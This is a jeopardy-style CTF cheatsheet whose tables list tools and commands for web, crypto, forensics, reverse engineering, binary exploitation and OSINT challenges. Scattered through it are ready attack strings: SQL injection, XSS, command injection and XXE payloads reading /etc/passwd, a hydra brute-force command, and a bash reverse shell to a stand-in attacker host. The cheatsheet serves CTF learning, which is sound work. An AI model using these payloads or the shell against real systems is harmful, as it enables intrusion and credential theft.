# Jeopardy-Style CTF Cheatsheet
## Web Application Security

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Hidden Content** | Browser Dev Tools, Burp Suite | `CTRL+SHIFT+I` (Browser), `Ctrl+U` (View Source) | Check HTML comments, JavaScript files, robots.txt, .git folders |
| **Cookie Manipulation** | Cookie Editor extension, Burp | Edit cookies directly in browser | Modify, decode (base64), check JWT tokens (jwt.io) |
| **SQL Injection** | sqlmap, Burp Suite | `sqlmap -u "http://target.com/page?id=1" --dbs` | Try `' OR 1=1--`, `' UNION SELECT 1,2,3--` |
| **XSS** | Browser, custom scripts | `<script>alert(1)</script>`, `<img src=x onerror=alert(1)>` | Test input fields and URL parameters, try to bypass filters |
| **CSRF** | Burp Suite, custom HTML | Create forms that auto-submit | Check for missing CSRF tokens, test with custom forms |
| **File Upload** | Burp Suite, custom files | Prepare malicious files, manipulate Content-Type | Try alternate extensions (.php.jpg), bypass client-side validation |
| **Directory Traversal** | Browser, curl | `../../../etc/passwd`, `..%2f..%2f..%2fetc%2fpasswd` | Try to access files outside the web root |
| **Command Injection** | Browser, curl | `; ls`, `\| cat /etc/passwd`, `$(cat /flag.txt)` | Test input fields that might execute commands |
| **Server-Side Template Injection** | Custom payloads | `{{7*7}}`, `${7*7}`, `<%= 7*7 %>` | Test different template engine syntaxes |
| **Local File Inclusion** | Browser, curl | `?page=../../../etc/passwd` | Try path traversal to access local files |
| **XML External Entity (XXE)** | Custom XML payloads | `<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` | Test XML inputs for entity processing |

## Cryptography Challenges

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Caesar Cipher** | CyberChef, dcode.fr, Python | `for i in range(26): print(shift(ciphertext, i))` | Try all 26 shifts (brute force) |
| **Substitution Cipher** | quipqiup.com, dcode.fr | Frequency analysis | Look for common patterns (THE, AND) |
| **Vigenère Cipher** | CyberChef, dcode.fr | Determine key length, then solve | Find repeating patterns, use Kasiski examination |
| **XOR Encryption** | CyberChef, Python | `bytes(a ^ b for a, b in zip(bytes_a, bytes_b))` (Python; `bytes` objects do not support `^` directly) | Try single-byte XOR, try known plaintext |
| **Base64** | CyberChef, terminal | `base64 -d file.txt` | Recognize by `=` padding at end, `A-Za-z0-9+/` charset |
| **Hex Encoding** | CyberChef, Python, xxd | `xxd -r -p hex.txt` | Look for `0-9`, `a-f` characters |
| **RSA** | RsaCtfTool, Python | `python RsaCtfTool.py --publickey key.pub --private` | Check small primes, common modulus, Fermat factorization |
| **Hash Cracking** | Hashcat, john, CrackStation | `hashcat -m 0 hash.txt wordlist.txt` | Identify hash type, use rainbow tables or brute force |
| **OpenSSL** | OpenSSL | `openssl enc -d -aes-256-cbc -in file.enc -out file.dec` | Try common passwords, check challenge hints |
| **Steganography in Ciphertext** | Visual inspection | Search for patterns, analyze character distribution | Check for hidden messages in the structure of the ciphertext |
| **Multi-layered Encoding** | CyberChef, custom scripts | Chain decoding operations | Work backwards, identify each layer |

## Forensics

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **File Analysis** | file, strings, xxd | `file unknown`, `strings -n 8 file`, `xxd file` | Check file type, extract readable strings |
| **Image Forensics** | exiftool, binwalk, steghide | `exiftool image.jpg`, `binwalk -e image.jpg` | Check metadata, extract hidden files |
| **LSB Steganography** | zsteg, stegsolve, OpenStego | `zsteg image.png`, `stegsolve` (GUI tool) | Check least significant bits, try different bit planes |
| **Audio Steganography** | Audacity, Sonic Visualiser | Open file, view spectrogram (CTRL+3 in Audacity) | Look for patterns in the spectrogram, Morse code |
| **Memory Dumps** | Volatility | `vol.py -f memory.dump imageinfo`, `vol.py -f memory.dump --profile=Win7SP1x64 pslist` | Identify processes, network connections, retrieve files |
| **Disk Images** | Autopsy, FTK Imager, TestDisk | Mount image, browse filesystem | Recover deleted files, examine file system artifacts |
| **Network Captures** | Wireshark, tcpdump, NetworkMiner | `wireshark capture.pcap`, `tcpdump -r capture.pcap` | Follow TCP streams, extract files, analyze HTTP traffic |
| **PDF Analysis** | pdfid, pdf-parser, peepdf | `pdfid suspicious.pdf`, `pdf-parser -s JavaScript suspicious.pdf` | Check for hidden objects, JavaScript, embedded files |
| **USB Artifacts** | RegRipper, Autopsy | Examine Windows registry | Check setupapi logs, USB device history |
| **ZIP/Archive Analysis** | zipdetails, file-roller, foremost | `zipdetails archive.zip` | Check for hidden files, broken archives |
| **Corrupted Files** | hexedit, bless | Manual hex editing | Fix file headers, repair broken structures |

## Reverse Engineering

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Binary Analysis** | Ghidra, IDA Pro, radare2 | `r2 -A binary`, `ghidra` (GUI) | Disassemble, look for interesting functions |
| **Static Analysis** | objdump, nm, strings | `objdump -d binary`, `nm binary`, `strings binary` | Check for function names, strings, disassembly |
| **Dynamic Analysis** | GDB, PEDA, strace, ltrace | `gdb ./binary`, `strace ./binary`, `ltrace ./binary` | Set breakpoints, analyze memory, trace calls |
| **Patching Binaries** | hexedit, Ghidra, radare2 | `r2 -w binary`, patch with hex editor | Modify conditions, bypass checks |
| **Anti-debugging** | GDB scripts, strace | Set hardware breakpoints, analyze patterns | Look for time checks, debugger detection |
| **Obfuscated Code** | De-obfuscation tools, manual analysis | Rename variables, reformat code | Look for patterns, decode strings |
| **Android APK** | jadx, apktool, dex2jar | `apktool d app.apk`, `jadx-gui app.apk` | Decompile to Java, check AndroidManifest.xml |
| **Java/JAR** | JD-GUI, CFR decompiler | `java -jar cfr.jar target.jar --outputdir output` | Decompile to source, check resources |
| **Python** | uncompyle6, pyinstxtractor | `uncompyle6 script.pyc` | Decompile to source |
| **.NET/C#** | dnSpy, ILSpy | Open with dnSpy (GUI) | Decompile to source, modify and recompile |
| **Go Binaries** | Ghidra with Go plugin | Look for Go signatures | Identify main.main, recover structures |

## Binary Exploitation

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Buffer Overflow** | GDB, PEDA, pwntools | `pattern create 100`, check EIP/RIP overwrite | Find offset, control EIP, locate/create shellcode |
| **Format String** | GDB, pwntools | `%x %x %x` to leak stack, `%n` to write | Leak addresses, overwrite GOT/return addresses |
| **Return-to-Libc** | GDB, ROPgadget, pwntools | `ROPgadget --binary ./target` | Find gadgets, build ROP chain |
| **Heap Exploitation** | GDB, heapinfo, pwntools | Analyze heap structures | Understand allocator, exploit use-after-free/double-free |
| **ROP (Return Oriented Programming)** | ROPgadget, ropper | `ROPgadget --binary ./target --ropchain` | Build chain of gadgets to execute arbitrary code |
| **Integer Overflow** | GDB, code review | Find vulnerable math operations | Identify wrap-around conditions |
| **Race Conditions** | strace, custom scripts | Identify time-of-check/time-of-use issues | Create script to exploit timing windows |
| **PIE/ASLR Bypass** | GDB, `info proc mappings` | Leak addresses, partial overwrite | Find information leaks to determine addresses |
| **Shellcoding** | pwntools, shellcraft | `shellcraft.sh()` or custom shellcode | Create or adapt shellcode for specific scenarios |
| **Kernel Exploitation** | Specialized tools, GDB | Varies based on challenge | Understand kernel structures, find vulnerabilities |
| **SROP (Sigreturn Oriented Programming)** | pwntools | Use `SigreturnFrame` in pwntools | Craft fake signal frames to control registers |

## OSINT (Open Source Intelligence)

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Social Media Research** | Sherlock, Social Mapper | `sherlock username` | Search for usernames across platforms |
| **Email Investigation** | theHarvester, Hunter.io | `theHarvester -d company.com -b all` | Gather email formats, verify addresses |
| **Domain Intelligence** | Whois, nslookup, dnsrecon | `whois domain.com`, `dnsrecon -d domain.com` | Check registration, subdomains, DNS records |
| **Image Analysis** | Google Images, Yandex, TinEye | Reverse image search | Find original source, hidden locations/data |
| **Geolocation** | GeoGuessr techniques, Google Maps | Look for landmarks, signs, architecture | Identify location from visual clues |
| **Public Records** | Public databases, search engines | Advanced Google dorks | Find specific document types, information |
| **Person Research** | People search engines, public records | Search by name, location, associations | Build connections between entities |
| **Phone Numbers** | PhoneInfoga, truecaller | `phoneinfoga scan -n +1234567890` | Identify carrier, location, owner |
| **Metadata Analysis** | exiftool, metagoofil | `exiftool document.pdf` | Extract device info, location, author |
| **Wireless Networks** | Wigle.net | Search by BSSID/SSID | Find physical locations of wireless access points |
| **Website Archives** | Wayback Machine, archive.today | Check historical versions | Find deleted content, changes over time |

## Programming Challenges

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Python Scripting** | Python, pwntools | `from pwn import *` for CTF scripts | Automate repetitive tasks, solve mathematical problems |
| **Socket Programming** | Python, netcat, pwntools | `r = remote('host', port)` | Create a client to interact with the remote service |
| **Parsing & Data Extraction** | Python (re, beautifulsoup4) | `import re`, `from bs4 import BeautifulSoup` | Extract patterns from text/HTML, parse structured data |
| **Algorithm Implementation** | Python, C/C++ | Implement common algorithms | Understand the problem, code an efficient solution |
| **Esoteric Languages** | Specialized interpreters | Research language specifications | Identify the language (brainfuck, Ook!, etc.), use an interpreter |
| **Automation** | Python, Bash scripting | Create script to solve repetitive challenges | Automate multiple requests, parse responses |
| **API Interaction** | Python (requests), Postman | `import requests` | Understand API endpoints, craft proper requests |
| **SQL Challenges** | MySQL, SQLite, Python | `import sqlite3` | Create queries to extract specific data |
| **Regular Expressions** | regex101.com, Python re | `re.findall(pattern, text)` | Create patterns to match/extract specific text |
| **Cryptography Implementation** | Python (pycryptodome, cryptography) | `from Crypto.Cipher import AES` | Implement encryption/decryption algorithms |
| **Computational Challenges** | Python, SageMath | Mathematical libraries | Solve number theory, optimization problems |

## Miscellaneous Techniques

| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **QR Codes** | ZBar, mobile phone | `zbarimg qrcode.png` | Scan code, check for errors/modifications |
| **Morse Code** | Audio tools, online converters | Listen or visualize, convert to text | Transcribe dots/dashes, convert to ASCII |
| **Barcode** | ZBar, barcode scanners | `zbarimg barcode.png` | Identify barcode type, scan |
| **Whitespace/Nonprintable** | hexdump, xxd, specialized tools | `xxd file \| grep -v "0000"` | Look for tab/space patterns, invisible characters |
| **Brainfuck/Esoteric Languages** | Online interpreters | Identify syntax, use appropriate interpreter | Recognize patterns, find corresponding interpreter |
| **Parity Bits** | Custom scripts | Check bit patterns | Identify odd/even parity schemes |
| **Magic Numbers/File Headers** | hexedit, xxd | `xxd file \| head` | Fix incorrect file headers, identify true file type |
| **Location-based Challenges** | Google Maps, OSINT techniques | Research geographic elements | Look for coordinates, landmarks, geotags |
| **Subway/Train Maps** | Official transit maps | Research transit systems | Decode station sequences, find connections |
| **Book Ciphers** | Online databases, physical books | Identify book, apply cipher method | Look for page/line/word references |
| **3D Files/Printing** | Blender, MeshLab | Open and inspect 3D models | Look inside 3D models, check for hidden text |
| **Historic/Classical Ciphers** | dcode.fr, specialized tools | Research cipher methods | Identify cipher from clues, apply appropriate technique |

## Useful Command-Line One-Liners

| Purpose | Command | Notes |
|---------|---------|-------|
| **Extract strings from binary** | `strings -n 8 binary \| grep -i flag` | Find strings containing "flag" |
| **Find hidden text in image** | `steghide extract -sf image.jpg -p ""` | Attempts extraction with an empty passphrase (without `-p`, steghide prompts for one) |
| **Extract embedded files** | `binwalk -e suspicious_file` | Extracts detected files |
| **Follow TCP stream in PCAP** | `tshark -r capture.pcap -Y "tcp.stream eq 1" -T fields -e data` | Extract a specific TCP stream |
| **Convert hex to ASCII** | `echo "48656c6c6f" \| xxd -r -p` | Hex to text conversion |
| **Analyze image metadata** | `exiftool -a -u image.jpg` | Shows all metadata including unknown tags |
| **Fix file signature/magic bytes** | `printf '\x89\x50\x4e\x47' \| dd of=file.png bs=1 count=4 conv=notrunc` | Rewrites the first 4 bytes of a corrupted PNG header in place |
| **Extract ZIP comment** | `unzip -z file.zip` | Get hidden info in the ZIP comment field |
| **Get HTTP headers** | `curl -I https://example.com` | Check server headers for info |
| **Extract EXIF GPS data** | `exiftool -n -p '$GPSLatitude, $GPSLongitude' image.jpg` | Extract coordinates from image |
| **Find files modified in last 24h** | `find / -type f -mtime -1` | Recent file changes |
| **Inspect TLS handshake and certificate** | `openssl s_client -connect example.com:443` | SSL/TLS certificate analysis |
| **Get favicon hash for Shodan** | `curl https://example.com/favicon.ico \| openssl dgst -md5` | Quick favicon fingerprint for local comparison; Shodan's `http.favicon.hash` is MurmurHash3 over the base64-encoded file, not MD5 |
| **Brute force basic auth** | `hydra -l admin -P wordlist.txt example.com http-get /admin/` | Password attacks |
| **Extract SSL certificate details** | `echo \| openssl s_client -connect example.com:443 -showcerts` | Certificate analysis (the `echo` closes stdin so the command exits) |
| **Check for SQL injection** | `sqlmap -u "https://example.com/page.php?id=1" --dbs` | Quick SQLi test |
| **Find writable web directories** | `find /var/www/ -type d -writable` | Identify upload targets |
| **List all open ports** | `netstat -tulpn` | Check listening services |
| **Verify file hash** | `sha256sum file.bin` | Confirm file integrity |
| **One-liner reverse shell** | `bash -i >& /dev/tcp/attacker-ip/4444 0>&1` | Basic reverse shell |
| **Convert epoch time** | `date -d @1609459200` | Translate timestamps |